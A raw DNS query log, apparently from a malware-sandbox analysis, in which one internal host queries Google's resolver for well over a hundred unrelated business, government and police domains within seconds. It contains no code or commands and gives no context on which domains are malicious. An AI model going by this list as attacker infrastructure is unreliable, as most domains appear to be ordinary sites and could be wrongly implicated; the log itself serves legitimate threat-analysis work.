                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.202518940 CEST192.168.2.68.8.8.80x6ee3Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.223536968 CEST192.168.2.68.8.8.80xfd94Standard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.266891956 CEST192.168.2.68.8.8.80x3d07Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.278454065 CEST192.168.2.68.8.8.80x5125Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.311055899 CEST192.168.2.68.8.8.80xec85Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.315850973 CEST192.168.2.68.8.8.80xc128Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.315850973 CEST192.168.2.68.8.8.80x5e95Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.319350004 CEST192.168.2.68.8.8.80xb335Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.357686043 CEST192.168.2.68.8.8.80x3368Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.360421896 CEST192.168.2.68.8.8.80xe264Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.360423088 CEST192.168.2.68.8.8.80x1e16Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.362483978 CEST192.168.2.68.8.8.80x9a04Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.365070105 CEST192.168.2.68.8.8.80xfa4cStandard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.368628979 CEST192.168.2.68.8.8.80x87b3Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.413234949 CEST192.168.2.68.8.8.80x5567Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.464438915 CEST192.168.2.68.8.8.80xc5b8Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.467859983 CEST192.168.2.68.8.8.80x1bc2Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.489367008 CEST192.168.2.68.8.8.80x4307Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.503277063 CEST192.168.2.68.8.8.80xb9a3Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.544749975 CEST192.168.2.68.8.8.80x9272Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.547945976 CEST192.168.2.68.8.8.80x5cefStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.560713053 CEST192.168.2.68.8.8.80x88c0Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.561270952 CEST192.168.2.68.8.8.80x19f2Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.602231026 CEST192.168.2.68.8.8.80xb1f1Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.614479065 CEST192.168.2.68.8.8.80xa007Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.628470898 CEST192.168.2.68.8.8.80x49abStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.679637909 CEST192.168.2.68.8.8.80xd402Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.712753057 CEST192.168.2.68.8.8.80x2f0Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.746432066 CEST192.168.2.68.8.8.80xdfefStandard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.749377012 CEST192.168.2.68.8.8.80x5ed2Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.755248070 CEST192.168.2.68.8.8.80xde7bStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.766172886 CEST192.168.2.68.8.8.80xec7aStandard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.809456110 CEST192.168.2.68.8.8.80x6d3eStandard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.810127020 CEST192.168.2.68.8.8.80x921dStandard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.831417084 CEST192.168.2.68.8.8.80x4bb2Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.835766077 CEST192.168.2.68.8.8.80xd7d9Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.838947058 CEST192.168.2.68.8.8.80x85cdStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.845062017 CEST192.168.2.68.8.8.80xc7Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.848494053 CEST192.168.2.68.8.8.80x5d32Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.852771997 CEST192.168.2.68.8.8.80x1930Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.855694056 CEST192.168.2.68.8.8.80x421cStandard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.859587908 CEST192.168.2.68.8.8.80x40e6Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.862613916 CEST192.168.2.68.8.8.80x3d9cStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.876621008 CEST192.168.2.68.8.8.80x7b05Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.888309956 CEST192.168.2.68.8.8.80x7d81Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.057867050 CEST192.168.2.68.8.8.80x9e4Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.059576035 CEST192.168.2.68.8.8.80x86f5Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.066443920 CEST192.168.2.68.8.8.80x660fStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.085772038 CEST192.168.2.68.8.8.80x9b59Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.135778904 CEST192.168.2.68.8.8.80xbc1Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.152443886 CEST192.168.2.68.8.8.80x210aStandard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.162486076 CEST192.168.2.68.8.8.80x6ca7Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.176464081 CEST192.168.2.68.8.8.80x53bStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.178756952 CEST192.168.2.68.8.8.80x4330Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.183765888 CEST192.168.2.68.8.8.80xfc8eStandard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.198720932 CEST192.168.2.68.8.8.80x5a6dStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.285968065 CEST192.168.2.68.8.8.80xb85fStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.344700098 CEST192.168.2.68.8.8.80xbe50Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.372617960 CEST192.168.2.68.8.8.80x4018Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.376008034 CEST192.168.2.68.8.8.80x64a8Standard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.386369944 CEST192.168.2.68.8.8.80x6f09Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.429979086 CEST192.168.2.68.8.8.80x2996Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.448854923 CEST192.168.2.68.8.8.80x93e2Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.460201025 CEST192.168.2.68.8.8.80xefStandard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.468852043 CEST192.168.2.68.8.8.80x77efStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.499994040 CEST192.168.2.68.8.8.80xf69cStandard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.548990965 CEST192.168.2.68.8.8.80x177Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.554838896 CEST192.168.2.68.8.8.80xa612Standard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.563632011 CEST192.168.2.68.8.8.80x132cStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.577374935 CEST192.168.2.68.8.8.80x354cStandard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.581032038 CEST192.168.2.68.8.8.80xbfbbStandard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.601322889 CEST192.168.2.68.8.8.80xa3daStandard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.604722977 CEST192.168.2.68.8.8.80xb7d3Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.605463982 CEST192.168.2.68.8.8.80xb23cStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.654871941 CEST192.168.2.68.8.8.80x204Standard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.677129030 CEST192.168.2.68.8.8.80xb7e3Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.692310095 CEST192.168.2.68.8.8.80xb60cStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.695377111 CEST192.168.2.68.8.8.80xeed6Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.699109077 CEST192.168.2.68.8.8.80xac2dStandard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.699748039 CEST192.168.2.68.8.8.80x1bb8Standard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.710576057 CEST192.168.2.68.8.8.80x6321Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.737039089 CEST192.168.2.68.8.8.80xb027Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.741096020 CEST192.168.2.68.8.8.80x2b0dStandard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.743855953 CEST192.168.2.68.8.8.80x2415Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.762408972 CEST192.168.2.68.8.8.80x1188Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.780052900 CEST192.168.2.68.8.8.80x2ed7Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.780447960 CEST192.168.2.68.8.8.80x7a78Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.781965017 CEST192.168.2.68.8.8.80x4536Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.793095112 CEST192.168.2.68.8.8.80x1f09Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.794528008 CEST192.168.2.68.8.8.80x45a2Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.795291901 CEST192.168.2.68.8.8.80x3e42Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.799592018 CEST192.168.2.68.8.8.80x431aStandard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.800142050 CEST192.168.2.68.8.8.80xb1bbStandard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.800584078 CEST192.168.2.68.8.8.80x6d57Standard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.808162928 CEST192.168.2.68.8.8.80x4957Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.837903976 CEST192.168.2.68.8.8.80x7c31Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.855585098 CEST192.168.2.68.8.8.80xc631Standard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.861655951 CEST192.168.2.68.8.8.80x1930Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.863363981 CEST192.168.2.68.8.8.80x4d58Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.871993065 CEST192.168.2.68.8.8.80x6ca5Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.873454094 CEST192.168.2.68.8.8.80x7c6Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.883385897 CEST192.168.2.68.8.8.80xe1e7Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.889862061 CEST192.168.2.68.8.8.80xdaa1Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.892838955 CEST192.168.2.68.8.8.80xb88Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.895788908 CEST192.168.2.68.8.8.80x97d1Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.900727987 CEST192.168.2.68.8.8.80xb81bStandard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.919307947 CEST192.168.2.68.8.8.80x1433Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.919307947 CEST192.168.2.68.8.8.80x124eStandard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.924551964 CEST192.168.2.68.8.8.80xafd9Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.924551964 CEST192.168.2.68.8.8.80x36caStandard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.928327084 CEST192.168.2.68.8.8.80x73e1Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.928327084 CEST192.168.2.68.8.8.80xbd04Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.928443909 CEST192.168.2.68.8.8.80xd218Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.938692093 CEST192.168.2.68.8.8.80x5314Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.940023899 CEST192.168.2.68.8.8.80x8140Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.945801973 CEST192.168.2.68.8.8.80xf869Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.946321964 CEST192.168.2.68.8.8.80xeb61Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.946391106 CEST192.168.2.68.8.8.80xb6b7Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.949352026 CEST192.168.2.68.8.8.80x7d81Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.957990885 CEST192.168.2.68.8.8.80x2481Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.962032080 CEST192.168.2.68.8.8.80x9b5eStandard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.968796015 CEST192.168.2.68.8.8.80xcceaStandard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.979608059 CEST192.168.2.68.8.8.80xd717Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:46.992844105 CEST192.168.2.68.8.8.80x2f0Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.000837088 CEST192.168.2.68.8.8.80x6b61Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.039145947 CEST192.168.2.68.8.8.80xf327Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.044177055 CEST192.168.2.68.8.8.80x3c1dStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.052772045 CEST192.168.2.68.8.8.80x9ac8Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.074337006 CEST192.168.2.68.8.8.80x5039Standard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.077183962 CEST192.168.2.68.8.8.80x330eStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.089854956 CEST192.168.2.68.8.8.80x86f5Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.096781969 CEST192.168.2.68.8.8.80xc674Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.097809076 CEST192.168.2.68.8.8.80x159bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.099659920 CEST192.168.2.68.8.8.80xe9d6Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.102737904 CEST192.168.2.68.8.8.80x5217Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.105132103 CEST192.168.2.68.8.8.80xbfd0Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.114878893 CEST192.168.2.68.8.8.80x278fStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.119102001 CEST192.168.2.68.8.8.80xd7f3Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.143464088 CEST192.168.2.68.8.8.80x195cStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.144787073 CEST192.168.2.68.8.8.80xce7Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.145606041 CEST192.168.2.68.8.8.80xbc1Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.166569948 CEST192.168.2.68.8.8.80xbe35Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.170358896 CEST192.168.2.68.8.8.80xa438Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.182992935 CEST192.168.2.68.8.8.80x5f58Standard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.185333014 CEST192.168.2.68.8.8.80x7257Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.196620941 CEST192.168.2.68.8.8.80xe35Standard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.239897013 CEST192.168.2.68.8.8.80xd2c8Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.257632017 CEST192.168.2.68.8.8.80xf6abStandard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.264954090 CEST192.168.2.68.8.8.80x9796Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.271960974 CEST192.168.2.68.8.8.80xb98bStandard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.274085045 CEST192.168.2.68.8.8.80xd471Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.288471937 CEST192.168.2.68.8.8.80xa041Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.288471937 CEST192.168.2.68.8.8.80x834bStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.295392990 CEST192.168.2.68.8.8.80x856eStandard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.303018093 CEST192.168.2.68.8.8.80x9245Standard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.311655998 CEST192.168.2.68.8.8.80x3a34Standard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.311656952 CEST192.168.2.68.8.8.80xbba5Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.313177109 CEST192.168.2.68.8.8.80xc93dStandard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.316601038 CEST192.168.2.68.8.8.80x5125Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.330924034 CEST192.168.2.68.8.8.80xb0a7Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.339018106 CEST192.168.2.68.8.8.80x450fStandard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.344718933 CEST192.168.2.68.8.8.80xcd6aStandard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.352283955 CEST192.168.2.68.8.8.80xa193Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.356086969 CEST192.168.2.68.8.8.80xd8d2Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.356508017 CEST192.168.2.68.8.8.80x2b27Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.357968092 CEST192.168.2.68.8.8.80xe33fStandard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.362881899 CEST192.168.2.68.8.8.80x9a5dStandard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.363857985 CEST192.168.2.68.8.8.80x7a0cStandard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.371081114 CEST192.168.2.68.8.8.80x573Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.377602100 CEST192.168.2.68.8.8.80x61d9Standard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.422733068 CEST192.168.2.68.8.8.80x1868Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.424650908 CEST192.168.2.68.8.8.80xb68eStandard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:47.435103893 CEST192.168.2.68.8.8.80x86dcStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
